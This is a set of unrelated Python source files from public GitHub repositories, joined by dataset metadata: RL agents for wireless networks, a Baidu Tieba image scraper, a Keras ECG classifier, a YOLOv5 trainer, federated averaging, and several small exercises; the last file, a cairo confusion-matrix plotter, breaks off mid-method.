training_schedule=10) for _ in range(n_agents)]\n\"\"\"\n# --------------------> End Create Agents <--------------------\n\ndef distance(x1, y1, x2, y2):\n \"\"\" Returns the 2D Euclidean distance between two points. 
\"\"\" \n return np.sqrt((x1 - x2)**2 + (y1 - y2)**2)\n\ndef state_to_observations(state):\n \"\"\"\n Positions are [Rx0_x, Rx0_y, Tx1_x, Tx1_y, ...], where the number is the node id. Trasmitter i communicates with \n receiver (i - 1).\n \"\"\"\n positions = state[:4*n_agents]\n other_obs = state[4*n_agents:]\n other_obs_per_agent = len(other_obs) // n_agents\n\n agent_states_list = []\n for i in range(n_agents):\n agent_state = []\n \n # Get distances from transmitter to receivers\n for j in range(len(positions) // 4):\n transmitter_id = 4*i + 2 # id of x-position of transmitter i in positions list; y-position is next element.\n receiver_id = 4*j # id of x-position of receiver j in positions list; y-position is next element.\n transmitter_x = positions[transmitter_id]\n transmitter_y = positions[transmitter_id + 1]\n receiver_x = positions[receiver_id]\n receiver_y = positions[receiver_id + 1]\n tx_to_rx_distance = distance(transmitter_x, transmitter_y, receiver_x, receiver_y)\n agent_state.append(tx_to_rx_distance / max_distance)\n\n obs_idx = i*other_obs_per_agent\n agent_state += other_obs[obs_idx: obs_idx + other_obs_per_agent] \n\n agent_state = np.array(agent_state).reshape(1, -1) \n agent_states_list.append(agent_state)\n\n return agent_states_list\n\n\ndef info_string_parser(info):\n \"\"\"\n Converts a sting of comma separated values to a list of floats\n Input:\n - info (string): comma separated values\n Returns:\n - A list of floats\n \"\"\"\n return [float(x) for x in info.split(',')]\n\n# --------------------> Main loop <--------------------\ncurrIt = 0\ntry:\n while True:\n stepIdx = 0\n rewards = []\n action_list = []\n states = []\n scores = [[] for _ in range(n_agents)]\n rewards = [] \n\n state = env.reset()\n state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n \n while True:\n actions = []\n action_probs = []\n for i in range(n_agents):\n # If the buffer is zero, don't use RL\n if state[i][0][-1] == 0:\n actions.append(-1)\n action_probs.append(-1)\n else:\n action = agents[i].choose_action(state[i]) \n actions.append(action)\n\n next_state, reward, done, info = env.step(actions)\n next_state = state_to_observations(next_state)\n\n info_list = info_string_parser(info)\n\n for i in range(n_agents):\n agent_action = actions[i]\n if agent_action == -1: # RL agent not invoked. 
Do not save transition to memory\n print(\"RL not used\")\n continue\n agent_state = state[i]\n agent_next_state = next_state[i]\n agent_reward = info_list[i]\n agents[i].remember(agent_state, agent_action, agent_reward, agent_next_state, done) \n\n agents[i].learn()\n \n for i in range(n_agents):\n scores[i].append(info_list[i])\n\n rewards.append(info_list)\n action_list.append(actions)\n states.append(state)\n\n state = next_state\n \n stepIdx += 1\n if stepIdx % 100 == 0:\n print(\"Step: \", stepIdx)\n for i in range(n_agents):\n print(\"mean (last 100)\", np.mean(scores[i][-100:]))\n if i == (n_agents - 1):\n print()\n\n if done:\n # Record data in CSV\n if save == True:\n data = [list(reward) + list(action) + list(np.array(state).flatten()) for reward, action, state in zip(rewards, action_list, states)]\n with open(\"data\" + \".csv\", \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(data)\n break\n\n currIt += 1\n if currIt == iterationNum:\n break\n\nexcept KeyboardInterrupt:\n print(\"Ctrl-C -> Exit\")\n \nfinally:\n env.close()\n print(\"RL Done\")\n","repo_name":"anujagann/MR-iNet","sub_path":"example_scenario/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37631154492","text":"import re\n\nimport requests\nfrom lxml import etree\nimport json\n\n\"\"\"\n爬取某个贴吧里的所有帖子,和帖子中图片\n\n思路:\n1. 准备URL,https://tieba.baidu.com/f?kw=吧名&mo_device=1&pn=0&\n2. 发送请求, 获取响应数据\n3. 解析数据, 提取需要数据\n4. 保存数据\n\n列表页的分页\nURL规律:\n第1页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=0&\n第2页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=50&\n第3页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=100&\n\"\"\"\n\n\nclass TiebaSpider(object):\n def __init__(self):\n self.name = '图拉丁'\n self.url = 'https://tieba.baidu.com/f?kw='+self.name+'&pn={}&'\n # 请求头\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'\n }\n # 贴吧域名(用于补全URL)\n self.tieba_url = 'https://tieba.baidu.com'\n\n def run(self):\n next_url = self.url\n while next_url:\n html = self.get_html(next_url)\n data_list,next_url = self.get_data(html)\n self.save_data(data_list)\n\n def get_html(self, url):\n \"\"\"发送请求,得到数据\"\"\"\n html = requests.get(url=url,headers=self.headers)\n # print(test.content.decode())\n return html.content.decode()\n\n def get_data(self, html):\n \"\"\"解析内容\"\"\"\n element = etree.HTML(html)\n li_list = element.xpath('//li[@class=\"tl_shadow tl_shadow_new\"]')\n # print(len(li_list))\n data_list = []\n for li in li_list:\n item = {}\n item['title'] = li.xpath('./a/div[@class=\"ti_title\"]/span/text()')\n item['detail_url'] = self.tieba_url + li.xpath('./a/@href')[0]\n item['imgs'] = self.get_imgs(item['detail_url'])\n # print(item)\n data_list.append(item)\n\n # 从html源码中提取\"page_size\":一页多少条\n page_size = int(re.findall('\"page_size\":(\\d+)',html)[0])\n # 从html源码中提取\"current_page\":当前页号\n current_page = int(re.findall('\"current_page\":(\\d+)',html)[0])\n # 从html源码中提取\"total_page\":总页数\n total_page = int(re.findall('\"total_page\":(\\d+)',html)[0])\n # 如果有下一页,就生成下一页URL\n if current_page < total_page:\n next_url = self.url.format(current_page * page_size)\n else:\n next_url = None\n print(next_url)\n return data_list,next_url\n\n\n def save_data(self, data_list):\n file_name = 
\"./test/{}.txt\".format(self.name)\n with open(file_name,'a',encoding='utf-8') as f:\n for data in data_list:\n json.dump(data,f,ensure_ascii=False)\n f.write('\\n')\n\n def get_imgs(self, detail_url):\n\n # print(detail_url_pattern)\n\n while True:\n detail_url_pattern = detail_url + '&pn={}'\n imgs = []\n # 发送数据,获取每个贴的响应数据\n detail_page = self.get_html(detail_url)\n # 每个贴的响应对象\n element = etree.HTML(detail_page)\n # print(element)\n # 每个贴的图片\n img_urls = element.xpath('//div[@data-class=\"BDE_Image\"]/@data-url')\n # print(img_urls)\n # 解码变高清大图\n for img_url in img_urls:\n img_url = requests.utils.unquote(img_url)\n img_url = img_url.split('src=')[1]\n imgs.append(img_url)\n page_sizes = re.findall('\"page_size\":(\\d+)', detail_page)\n\n # 从html源码中提取\"page_size\":一页多少条\n page_size = int(page_sizes[0])\n # 从html源码中提取\"current_page\":当前页号\n current_page = int(re.findall('\"current_page\":(\\d+)', detail_page)[0])\n # 从html源码中提取\"total_page\":总页数\n total_page = int(re.findall('\"total_page\":(\\d+)', detail_page)[0])\n # 如果有下一页,就生成下一页URL\n if current_page < total_page:\n detail_url = detail_url_pattern.format(current_page * page_size)\n else:\n break\n print(imgs)\n return imgs\n\n\nif __name__ == '__main__':\n spider = TiebaSpider()\n spider.run()\n","repo_name":"chainrain/pachong","sub_path":"day04 06.贴吧爬虫的提取详情页图片url.py","file_name":"day04 06.贴吧爬虫的提取详情页图片url.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35791667930","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0014_auto_20160404_1908'),\n ('djangocms_repeater', '0028_remove_boardmember_image'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='boardmember',\n name='cmsplugin_ptr',\n ),\n migrations.DeleteModel(\n name='BoardMember',\n ),\n ]\n","repo_name":"womenhackfornonprofits/seo-london","sub_path":"djangocms_repeater/migrations/0029_auto_20161121_2235.py","file_name":"0029_auto_20161121_2235.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3250439336","text":"from keras.layers import Dense, Dropout, Conv2D, Input, MaxPool2D, Flatten\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers import ELU\n\n\n\ndef proposed_model(input_h=128, input_w=128):\n input_shape = (input_h, input_w, 3)\n\n nb_classes = 8\n inputs = Input(input_shape)\n\n # layer 1\n x = Conv2D(64, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(inputs)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 2\n x = Conv2D(64, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer3\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n # layer4\n x = Conv2D(128, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer5\n x = Conv2D(128, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer6\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n # layer7\n x = Conv2D(256, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 8\n x = Conv2D(256, (3, 3), strides=(1, 
1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 9\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n x = Flatten()(x)\n\n # layer 10\n x = Dense(2048)(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n x = Dropout(0.5)(x)\n x = Dense(nb_classes, activation='softmax')(x)\n\n model = Model(inputs, x)\n return model","repo_name":"chingchan1996/ECG-Arrhythmia-Classification-in-2D-CNN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"23087265986","text":"#ATENCAO VALERIUM NAO VEJA AS LINHAS DE CODIGO, APENAS EXECUTE DEPOIS VOCE VE!!!!!!!\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n#VOLTE E LEIA A 1º LINHA\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nmensagem3 = \"É simples porém de coração\"\n\nage = 18\n\nidade = \"_anos\"\n\nmensagem = \"Feliz_aniversário\"\n\nPara_Vittorio = str(mensagem) + \"_de_\" + str(age) + str(idade) + \"!\"\n\ntitulo = \"Para Vittorio de Ricardo\"\n\nmensagem2 = \"Obrigado por ser a pessoa que você é.\"\n\nmensagem_final = str(Para_Vittorio) + '\\n' + str(mensagem2)\n\nTotal = str(titulo) + '\\n' + str(mensagem_final) + '\\n' + str(mensagem3)\n\nprint(Total)\n\n\n","repo_name":"Haiz3n/aula-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18741202392","text":"'''\r\n오르막 수는 수의 자리가 오름차순을 이루는 수를 말한다. 이 때, 인접한 수가 같아도 오름차순으로 친다.\r\n\r\n예를 들어, 2234와 3678, 11119는 오르막 수이지만, 2232, 3676, 91111은 오르막 수가 아니다.\r\n\r\n수의 길이 N이 주어졌을 때, 오르막 수의 개수를 구하는 프로그램을 작성하시오. 
수는 0으로 시작할 수 있다.\r\n'''\r\n\r\nn = 2\r\n\r\ncache = [[1 for i in range(10)] for _ in range(n+1)]\r\n\r\nfor i in range(2, n+1):\r\n for j in range(10):\r\n cache[i][j] = 0\r\n for k in range(0, j+1):\r\n cache[i][j] += cache[i-1][k]\r\n\r\nprint(sum(cache[-1]))","repo_name":"SungGV/algorithmPractice","sub_path":"algorithms/Dynamic_Programming/incrementing_num.py","file_name":"incrementing_num.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43779803226","text":"from tkinter import *\nimport random\n\nclass Ejercicio:\n def __init__(self):\n self.root = Tk()\n self.canvas1 = Canvas(self.root, width=800, height=600, background=\"black\")\n self.canvas1.tag_bind(\"cuadrado\", \"<ButtonPress-1>\",self.presion_boton)# # se presiona el boton derecho del mouse\n self.canvas1.tag_bind(\"cuadrado\", \"<Button1-Motion>\",self.moviendo) # envia información cuando se pmantiene presionado el boton y se mueve\n self.canvas1.grid(column=0, row=0)\n for i in range(101): # se crean 100 cuadros\n x1 = random.randint(0,800) \n y1 = random.randint(0,600)\n \n self.canvas1.create_rectangle(x1,y1,x1+20,y1+20 , fill=\"red\",tags = \"cuadrado\")\n self.cuadrado_moviendo = None # se dice que no se mueven los cuadros\n\n self.root.mainloop()\n def presion_boton(self,evento): # se recibe si se estta presionando un cuadrado (evento)\n cuadrado = self.canvas1.find_withtag(CURRENT) # busca el cuadrado actual presionado\n self.cuadrado_moviendo = (cuadrado, evento.x, evento.y) #se indica que el cuadrado actual es el que esta en movimiento\n def moviendo(self,evento):\n x, y = evento.x, evento.y # se define variable x | y\n cuadrado, x1, y1 = self.cuadrado_moviendo # se guardan las coordenadas del cuadro en su posición previa\n self.canvas1.move(cuadrado, x-x1, y- y1) # se pasan las coordenadas para mover el cuadro\n self.cuadrado_moviendo=(cuadrado, x, y) # se guardan las nuevas coordenadas del ultimo movimiento del cuadrado\n \n\n \n \n \n\nejercicio1 = Ejercicio()","repo_name":"onavarrete04/Aprendiendo-python","sub_path":"ejercicio_GUI_canvas_moveimage2.py","file_name":"ejercicio_GUI_canvas_moveimage2.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74376556092","text":"r\"\"\"\nFor training model.\nConsist of some Trainers.\n\"\"\"\n\nimport torch\nimport argparse\nimport torch.nn as nn\n\nfrom pathlib import Path\nfrom torch.cuda.amp import GradScaler\nfrom torch.optim.swa_utils import AveragedModel\nfrom warmup_scheduler_pytorch import WarmUpScheduler\n\nfrom visual.utils import WRITER\nfrom visual.utils.log import add_log_file, logging_start_finish, logging_initialize, LOGGER\nfrom visual.utils.loss import LossDetectYolov5\nfrom visual.utils.metrics import compute_fitness\nfrom visual.models.yolov5.yolov5_v6 import yolov5s_v6\nfrom visual.metaclass.metatrainer import MetaTrainDetect\nfrom visual.utils.optimizers import select_optimizer\nfrom visual.utils.lr_schedulers import select_lr_scheduler\nfrom visual.utils.datasets import get_and_check_datasets_yaml, DatasetDetect\nfrom visual.utils.general import timer, load_all_yaml, save_all_yaml, init_seed, select_one_device, loss_to_mean\n\nfrom val_detect import ValDetect\n\nr\"\"\"Set Global Constant for file save and load\"\"\"\nROOT = Path.cwd() # **/visual-framework root directory\n\n\nclass _Args(object):\n def __init__(self, args):\n self.hyp = 
args.hyp\n self.inc = args.inc\n self.swa_c = args.swa_c\n self.device = args.device\n self.epochs = args.epochs\n self.weights = args.weights\n self.augment = args.augment\n self.workers = args.workers\n self.shuffle = args.shuffle\n self.datasets = args.datasets\n self.save_name = args.save_name\n self.save_path = args.save_path\n self.image_size = args.image_size\n self.batch_size = args.batch_size\n self.pin_memory = args.pin_memory\n self.tensorboard = args.tensorboard\n self.freeze_names = args.freeze_names\n self.visual_image = args.visual_image\n self.visual_graph = args.visual_graph\n self.data_augment = args.data_augment\n self.swa_start_epoch = args.swa_start_epoch\n self.model_state_dict = args.model_state_dict\n\n # Set load way\n self._load_model = args.load_model\n self._load_swa_model = args.load_swa_model\n self._load_optimizer = args.load_optimizer\n self._load_gradscaler = args.load_gradscaler\n self._load_start_epoch = args.load_start_epoch\n self._load_best_fitness = args.load_best_fitness\n self._load_lr_scheduler = args.load_lr_scheduler\n self._load_warmup_lr_scheduler = args.load_warmup_lr_scheduler\n\n\nclass TrainDetect(_Args, MetaTrainDetect):\n r\"\"\"Trainer for detection, built by mixins\"\"\"\n\n @logging_initialize('trainer')\n def __init__(self, args):\n super(TrainDetect, self).__init__(args)\n # TODO design a way to get all parameters in train setting for research if possible\n\n # Get path_dict\n self.path_dict = self.set_save_path(('hyp', 'hyp.yaml'), ('logger', 'logger.log'), ('writer', 'tensorboard'),\n ('args', 'args.yaml'), ('datasets', 'datasets.yaml'),\n ('last', 'weights/last.pt'), ('best', 'weights/best.pt'),\n ('json_gt_val', 'json_gt_val.json'), ('json_gt_test', 'json_gt_test.json'),\n ('json_dt', 'json_dt.json'), ('coco_results', 'coco_results.json'))\n\n # Add FileHandler for logger\n add_log_file(self.path_dict['logger'])\n\n # Set tensorboard writer\n self.writer = self.set_tensorboard_writer(self.path_dict['writer'])\n\n # Set one device\n self.cuda = (self.device != 'cpu')\n self.device = select_one_device(self.device) # requires (model, images, labels).to(self.device)\n\n # Get datasets path dict\n self.datasets = get_and_check_datasets_yaml(self.datasets)\n\n # Load hyp yaml\n self.hyp = load_all_yaml(self.hyp)\n\n # Initialize or auto seed manual and save in self.hyp\n self.hyp['seed'] = init_seed(self.hyp['seed'], self.hyp['deterministic'])\n\n # scale loss\n nl = int(len(self.datasets['anchors']))\n self.hyp['bbox'] *= 3 / nl\n self.hyp['cls'] *= self.datasets['nc'] / 80 * 3. / nl\n self.hyp['obj'] *= (self.image_size / 640) ** 2 * 3. 
/ nl\n\n # Save yaml dict\n save_all_yaml(\n (self.hyp, self.path_dict['hyp']),\n (vars(args), self.path_dict['args']),\n (self.datasets, self.path_dict['datasets'])\n )\n args = self.release_attr()\n\n # TODO auto compute anchors when anchors is None in self.datasets\n\n # Load checkpoint\n self.checkpoint = self.load_checkpoint(self.weights)\n\n # TODO upgrade DP DDP\n\n # Initialize or load model\n self.model = self.load_model(\n yolov5s_v6(self.inc, self.datasets['nc'], self.datasets['anchors'], self.image_size),\n **self._load_model\n )\n\n # Initialize or load swa_model\n self.swa_model = self.load_swa_model(AveragedModel(self.model, self.device), **self._load_swa_model)\n\n # Unfreeze model\n self.unfreeze_model()\n\n # Freeze layers of model\n self.freeze_layers(self.freeze_names)\n\n # Set parameter groups list to for the optimizer\n param_groups = self.set_param_groups(\n (('bias', nn.Parameter, {}),\n ('weight', nn.BatchNorm2d, {}),\n ('weight', nn.Parameter, {'weight_decay': self.hyp['weight_decay']}))\n )\n\n # Initialize and load optimizer\n self.optimizer = self.load_state_dict(\n select_optimizer(param_groups, self.hyp['optimizer'], self.hyp['optimizer_kwargs']),\n **self._load_optimizer\n )\n\n param_groups = self.release_attr()\n\n # Initialize and load lr_scheduler\n self.lr_scheduler = self.load_state_dict(\n select_lr_scheduler(self.optimizer, self.hyp['lr_scheduler'], self.hyp['lr_scheduler_kwargs']),\n **self._load_lr_scheduler\n )\n\n # Initialize and load GradScaler\n self.scaler = self.load_state_dict(GradScaler(enabled=self.cuda), **self._load_gradscaler)\n\n # Initialize or load start_epoch\n self.start_epoch = self.load_start_epoch(**self._load_start_epoch)\n\n # Initialize or load best_fitness\n self.best_fitness = self.load_best_fitness(**self._load_best_fitness)\n\n # Release self.checkpoint when load finished\n self.checkpoint = self.release_attr()\n\n # Get loss function\n self.loss_fn = LossDetectYolov5(self.model, self.hyp)\n\n # Set coco json path dict\n self.coco_json = {\n 'dt': self.path_dict['json_dt'],\n 'val': self.path_dict['json_gt_val'],\n 'test': self.path_dict['json_gt_test'] if self.datasets['test'] else self.path_dict['json_gt_val']\n }\n\n # Get dataloader for training validating testing\n self.train_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'train', self.image_size, self.augment, self.data_augment, self.hyp),\n shuffle=self.shuffle)\n\n self.val_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'val', self.image_size, coco_gt=self.coco_json['val']))\n\n self.test_dataloader = self.set_dataloader(\n DatasetDetect(self.datasets, 'test', self.image_size, coco_gt=self.coco_json['test'])\n ) if self.datasets['test'] else self.val_dataloader\n\n self.warmup_lr_scheduler = self.load_state_dict(\n WarmUpScheduler(self.optimizer, self.lr_scheduler,\n len_loader=len(self.train_dataloader),\n warmup_steps=self.hyp['warmup_steps'],\n warmup_start_lr=self.hyp['warmup_start_lr'],\n warmup_mode=self.hyp['warmup_mode'],\n verbose=self.hyp['verbose']),\n **self._load_warmup_lr_scheduler\n )\n\n self.val_class = ValDetect\n\n @logging_start_finish('Training')\n def train(self):\n for self.epoch in range(self.start_epoch, self.epochs):\n self.train_one_epoch(('total', 'bbox', 'class', 'object'))\n _, coco_stats = self.val_training()\n\n fitness = compute_fitness(coco_stats[:3], self.hyp['fit_weights']) # compute fitness for best save\n self.save_checkpoint_best_last(fitness, self.path_dict['best'], 
self.path_dict['last'],\n self.model_state_dict)\n # TODO maybe need a auto stop function for bad training\n\n self.model = self.release_attr()\n coco_eval, _ = self.test_trained()\n\n # save coco results\n self.save_coco_results(coco_eval, self.path_dict['coco_results'])\n\n # release all\n self.close_tensorboard()\n self.release_cuda_cache()\n\n @torch.no_grad()\n def val_training(self):\n if self.swa_start:\n model = self.swa_model.module\n else:\n model = self.model\n valer = self.val_class(model=model, half=True, dataloader=self.val_dataloader,\n loss_fn=self.loss_fn, cls_names=self.datasets['names'],\n epoch=self.epoch, writer=self.writer, visual_image=self.visual_image,\n coco_json=self.coco_json, hyp=self.hyp)\n results = valer.val_training()\n return results\n\n # @torch.inference_mode()\n @torch.no_grad()\n def test_trained(self):\n self.epoch = -1\n\n self.checkpoint = self.load_checkpoint(self.path_dict['best'])\n if self.checkpoint is None:\n self.checkpoint = self.load_checkpoint(self.path_dict['last'])\n LOGGER.info('Load last.pt for validating because of no best.pt')\n else:\n LOGGER.info('Load best.pt for validating')\n\n model = self.checkpoint['swa_model'].float().to(self.device)\n\n tester = self.val_class(model=model, half=False, dataloader=self.test_dataloader,\n loss_fn=self.loss_fn, cls_names=self.datasets['names'],\n epoch=self.epoch, writer=self.writer, visual_image=self.visual_image,\n coco_json=self.coco_json, hyp=self.hyp)\n results = tester.val_training()\n return results\n\n def visual_dataset(self, dataset, name):\n WRITER.add_datasets_images_labels_detect(self.writer, dataset, name)\n\n def update_swa_attr(self):\n pass\n\n def preprocess_iter(self, data, data_dict):\n x, labels, other_data, data_dict = super(TrainDetect, self).preprocess_iter(data, data_dict)\n x /= 255\n return x, labels, other_data, data_dict\n\n @staticmethod\n def mean_loss(index, loss_mean, loss, data_dict):\n (loss_items,) = data_dict['other_loss_iter']\n loss = torch.cat((loss.detach(), loss_items.detach()))\n loss_mean = loss_to_mean(index, loss_mean, loss)\n return loss_mean, data_dict\n\n\ndef parse_args_detect(known: bool = False):\n r\"\"\"\n Parse args for training.\n Args:\n known: bool = True or False, Default=False.\n parser will get two namespace which the second is unknown args, if known=True.\n\n Returns:\n namespace(for setting args)\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--tensorboard', type=bool,\n default=True, help='Use tensorboard to make visual')\n parser.add_argument('--visual_image', type=bool,\n default=True, help='Make image (train val test) visual')\n parser.add_argument('--visual_graph', type=bool,\n default=False, help='Make model graph visual')\n parser.add_argument('--swa_start_epoch', type=int,\n default=50, help='swa start')\n parser.add_argument('--swa_c', type=int,\n default=1, help='swa cycle length')\n parser.add_argument('--weights', type=str,\n default='F:/weights/yolov5/yolov5s_v6_sd.pt', help='The path of checkpoint')\n # parser.add_argument('--weights', type=str,\n # default=str(ROOT / 'runs/train/detect/exp8/weights/best.pt'), help='The path of checkpoint')\n # parser.add_argument('--weights', type=str, default='', help='The path of checkpoint')\n parser.add_argument('--freeze_names', type=list,\n default=['backbone', 'neck'], help='Layer name to freeze in model')\n parser.add_argument('--device', type=str,\n default='0', help='Use cpu or cuda:0 or 0')\n parser.add_argument('--epochs', type=int,\n default=10, 
help='The epochs for training')\n parser.add_argument('--batch_size', type=int,\n default=16, help='The batch size in training')\n parser.add_argument('--workers', type=int,\n default=0, help='For dataloader to load data')\n parser.add_argument('--shuffle', type=bool,\n default=True, help='Shuffle the training data')\n parser.add_argument('--pin_memory', type=bool,\n default=False, help='Load data to memory')\n parser.add_argument('--datasets', type=str,\n default=str(ROOT / 'data/datasets/detection/Customdatasets.yaml'),\n help='The path of datasets.yaml')\n parser.add_argument('--save_name', type=str,\n default='exp', help='The name of save dir')\n parser.add_argument('--save_path', type=str,\n default=str(ROOT / 'runs/train/detect'), help='The save path of results')\n parser.add_argument('--hyp', type=str,\n default=str(ROOT / 'data/hyp/hyp_detect_train.yaml'), help='The path of hyp.yaml')\n parser.add_argument('--augment', type=bool,\n default=False, help='Use random augment image')\n parser.add_argument('--data_augment', type=str,\n default='', help='The kind of data augmentation mosaic / mixup / cutout')\n parser.add_argument('--inc', type=int,\n default=3, help='The image channel to input')\n parser.add_argument('--image_size', type=int,\n default=640, help='The size of input image')\n parser.add_argument('--model_state_dict', type=bool,\n default=False, help='save model state_dict or model')\n\n parser.add_argument('--load_model',\n default={'load_key': 'model_state_dict', 'state_dict_operation': False, 'load': 'state_dict'},\n help='')\n parser.add_argument('--load_swa_model',\n default={'load_key': 'swa_model', 'state_dict_operation': True, 'load': None,\n 'load_n_averaged_key': None},\n help='')\n parser.add_argument('--load_optimizer',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_lr_scheduler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_warmup_lr_scheduler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_gradscaler',\n default={'load_key': None},\n help='')\n parser.add_argument('--load_start_epoch',\n default={'load_key': None, 'load': None},\n help='')\n parser.add_argument('--load_best_fitness',\n default={'load_key': None},\n help='')\n namespace = parser.parse_known_args()[0] if known else parser.parse_args()\n return namespace\n\n\n@timer\ndef train_detection():\n arguments = parse_args_detect()\n trainer = TrainDetect(arguments)\n trainer.train()\n\n\nif __name__ == '__main__':\n train_detection()\n\n # in the future\n # TODO colour str\n # TODO learn moviepy library sometimes\n\n # when need because it is complex\n # TODO add FLOPs compute module for model\n # TODO auto compute anchors\n\n # next work\n # TODO add necessary functions\n # TODO confusion matrix needed\n # TODO add plot curve functions for visual results\n # TODO design model structure\n","repo_name":"LEFTeyex/visual-framework","sub_path":"src/visual/demo/train_detect.py","file_name":"train_detect.py","file_ext":"py","file_size_in_byte":16346,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"73567828732","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport copy\nimport torch\nfrom torch import nn\nimport numpy as np\n\ndef FedAvg(w,alpha):\n w_avg = copy.deepcopy(w[0])\n n_clients = len(w)\n \n alpha = alpha/np.sum(alpha)\n #print(np.sum(alpha))\n #print(alpha)\n #alpha = np.random.uniform(0,1,n_clients)\n \n for l in w_avg.keys():\n 
w_avg[l] = w_avg[l] - w_avg[l]\n\n for l, layer in enumerate(w_avg.keys()): #for each layer\n w_kl = []\n for k in range(0,n_clients): #for each client\n w_avg[layer] += alpha[k]*w[k][layer]\n return w_avg\n","repo_name":"edvinli/federated-learning-mixture","sub_path":"models/FederatedAveraging.py","file_name":"FederatedAveraging.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"14587874734","text":"#!/usr/bin/env python\n\nimport sys\nfrom optparse import OptionParser\nimport numpy as np\nimport cairo\nfrom cpf.profiling.leave_one_out import confusion_matrix\nfrom cpf.profiling.confusion import load_confusion\n\ndef normal_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica')\n\ndef bold_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD)\n\ndef small_font(ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica')\n\n\nclass Title(object):\n def __init__(self, title):\n self.title = title\n\n def set_font(self, ctx):\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_font_size(7)\n ctx.select_font_face('Helvetica', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD)\n\n def height(self, ctx):\n if self.title:\n ctx.save()\n self.set_font(ctx)\n h = ctx.text_extents(self.title)[3]\n ctx.restore()\n return h + 5\n else:\n return 0\n\n def draw(self, ctx):\n if self.title:\n self.set_font(ctx)\n h = self.height(ctx) - 5\n ctx.move_to(0, h)\n ctx.show_text(self.title)\n ctx.stroke()\n\n\nclass Header(object):\n strings = ['True mechanistic class', 'Predicted class', 'Acc.']\n\n def set_font(self, ctx):\n normal_font(ctx)\n\n def height(self, ctx):\n ctx.save()\n self.set_font(ctx)\n h = max([ctx.text_extents(s)[3] for s in self.strings])\n ctx.restore()\n return h + 5\n\n def draw(self, ctx, matrix_left, matrix_size, figure_width):\n self.set_font(ctx)\n h = self.height(ctx) - 5\n 